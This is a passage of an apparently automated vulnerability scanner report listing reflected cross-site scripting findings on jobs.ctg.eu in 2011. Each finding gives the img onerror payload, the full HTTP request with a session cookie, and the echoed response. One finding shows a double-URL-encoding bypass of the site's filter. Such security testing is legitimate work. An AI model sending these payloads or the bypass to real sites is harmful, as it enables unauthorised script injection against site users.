Content-Length: 6731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules1a02d"><img src=a onerror=alert(1)>ae1a910df3b-system-system.css not-front not-logged-in page-modules1a02dimg-srca-onerroralert1ae1a910df3b no-sidebars">
...[SNIP]...

3.40. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41960"><img%20src%3da%20onerror%3dalert(1)>bb9a86cebe9 was submitted in the REST URL parameter 2. This input was echoed as 41960"><img src=a onerror=alert(1)>bb9a86cebe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system41960"><img%20src%3da%20onerror%3dalert(1)>bb9a86cebe9/system.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:32:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:32:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system41960"><img src=a onerror=alert(1)>bb9a86cebe9-system.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.41. http://jobs.ctg.eu/modules/system/system.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae674"><img%20src%3da%20onerror%3dalert(1)>1a80ccbe22f was submitted in the REST URL parameter 3. This input was echoed as ae674"><img src=a onerror=alert(1)>1a80ccbe22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/system/system.cssae674"><img%20src%3da%20onerror%3dalert(1)>1a80ccbe22f?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-system-system.cssae674"><img src=a onerror=alert(1)>1a80ccbe22f not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.42. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56d7"><img%20src%3da%20onerror%3dalert(1)>18564c695ef was submitted in the REST URL parameter 1. This input was echoed as f56d7"><img src=a onerror=alert(1)>18564c695ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modulesf56d7"><img%20src%3da%20onerror%3dalert(1)>18564c695ef/user/user.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:30:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:30:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modulesf56d7"><img src=a onerror=alert(1)>18564c695ef-user-user.css not-front not-logged-in page-modulesf56d7img-srca-onerroralert118564c695ef no-sidebars">
...[SNIP]...

3.43. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 384dd"><img%20src%3da%20onerror%3dalert(1)>cb03368af2d was submitted in the REST URL parameter 2. This input was echoed as 384dd"><img src=a onerror=alert(1)>cb03368af2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/user384dd"><img%20src%3da%20onerror%3dalert(1)>cb03368af2d/user.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:31:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:31:57 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-user384dd"><img src=a onerror=alert(1)>cb03368af2d-user.css not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.44. http://jobs.ctg.eu/modules/user/user.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /modules/user/user.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcae4"><img%20src%3da%20onerror%3dalert(1)>8e144cc5a4f was submitted in the REST URL parameter 3. This input was echoed as bcae4"><img src=a onerror=alert(1)>8e144cc5a4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /modules/user/user.cssbcae4"><img%20src%3da%20onerror%3dalert(1)>8e144cc5a4f?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="modules-user-user.cssbcae4"><img src=a onerror=alert(1)>8e144cc5a4f not-front not-logged-in page-modules no-sidebars">
...[SNIP]...

3.45. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1d6e"><img%20src%3da%20onerror%3dalert(1)>39ce1ac88d4 was submitted in the REST URL parameter 1. This input was echoed as b1d6e"><img src=a onerror=alert(1)>39ce1ac88d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sitesb1d6e"><img%20src%3da%20onerror%3dalert(1)>39ce1ac88d4/all/modules/antispam/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sitesb1d6e"><img src=a onerror=alert(1)>39ce1ac88d4-all-modules-antispam-antispam.js not-front not-logged-in page-sitesb1d6eimg-srca-onerroralert139ce1ac88d4 no-sidebars">
...[SNIP]...

3.46. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983d6"><img%20src%3da%20onerror%3dalert(1)>da38364a609 was submitted in the REST URL parameter 2. This input was echoed as 983d6"><img src=a onerror=alert(1)>da38364a609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all983d6"><img%20src%3da%20onerror%3dalert(1)>da38364a609/modules/antispam/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all983d6"><img src=a onerror=alert(1)>da38364a609-modules-antispam-antispam.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.47. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5fb9"><img%20src%3da%20onerror%3dalert(1)>1733aaca289 was submitted in the REST URL parameter 3. This input was echoed as a5fb9"><img src=a onerror=alert(1)>1733aaca289 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesa5fb9"><img%20src%3da%20onerror%3dalert(1)>1733aaca289/antispam/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesa5fb9"><img src=a onerror=alert(1)>1733aaca289-antispam-antispam.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.48. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b934a"><img%20src%3da%20onerror%3dalert(1)>9153850d8df was submitted in the REST URL parameter 4. This input was echoed as b934a"><img src=a onerror=alert(1)>9153850d8df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/antispamb934a"><img%20src%3da%20onerror%3dalert(1)>9153850d8df/antispam.js?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:39:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:39:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-antispamb934a"><img src=a onerror=alert(1)>9153850d8df-antispam.js not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.49. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70579"><img%20src%3da%20onerror%3dalert(1)>61f4e445c3a was submitted in the REST URL parameter 5. This input was echoed as 70579"><img src=a onerror=alert(1)>61f4e445c3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/antispam/antispam.js70579"><img%20src%3da%20onerror%3dalert(1)>61f4e445c3a?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:41:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:41:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-antispam-antispam.js70579"><img src=a onerror=alert(1)>61f4e445c3a not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.50. http://jobs.ctg.eu/sites/all/modules/antispam/antispam.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/antispam/antispam.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4af12%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eaec5804153d was submitted in the REST URL parameter 5. This input was echoed as 4af12"><img src=a onerror=alert(1)>aec5804153d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /sites/all/modules/antispam/antispam.js4af12%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eaec5804153d?L HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: jobs.ctg.eu

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 17:15:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS5fce01b171785c9633d86359009a9819=2f46511fc703c84f06d7bac34b7f258f; expires=Sun, 15-May-2011 20:49:05 GMT; path=/; domain=.jobs.ctg.eu
Last-Modified: Fri, 22 Apr 2011 17:15:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-antispam-antispam.js4af12"><img src=a onerror=alert(1)>aec5804153d not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.51. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e463"><img%20src%3da%20onerror%3dalert(1)>cdfba77e90c was submitted in the REST URL parameter 1. This input was echoed as 7e463"><img src=a onerror=alert(1)>cdfba77e90c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites7e463"><img%20src%3da%20onerror%3dalert(1)>cdfba77e90c/all/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites7e463"><img src=a onerror=alert(1)>cdfba77e90c-all-modules-cck-modules-fieldgroup-fieldgroup.css not-front not-logged-in page-sites7e463img-srca-onerroralert1cdfba77e90c no-sidebars">
...[SNIP]...

3.52. http://jobs.ctg.eu/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae427"><img%20src%3da%20onerror%3dalert(1)>69860021042 was submitted in the REST URL parameter 2. This input was echoed as ae427"><img src=a onerror=alert(1)>69860021042 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/allae427"><img%20src%3da%20onerror%3dalert(1)>69860021042/modules/cck/modules/fieldgroup/fieldgroup.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-allae427"><img src=a onerror=alert(1)>69860021042-modules-cck-modules-fieldgroup-fieldgroup.css not-front not-logged-in page-sites no-sidebars">
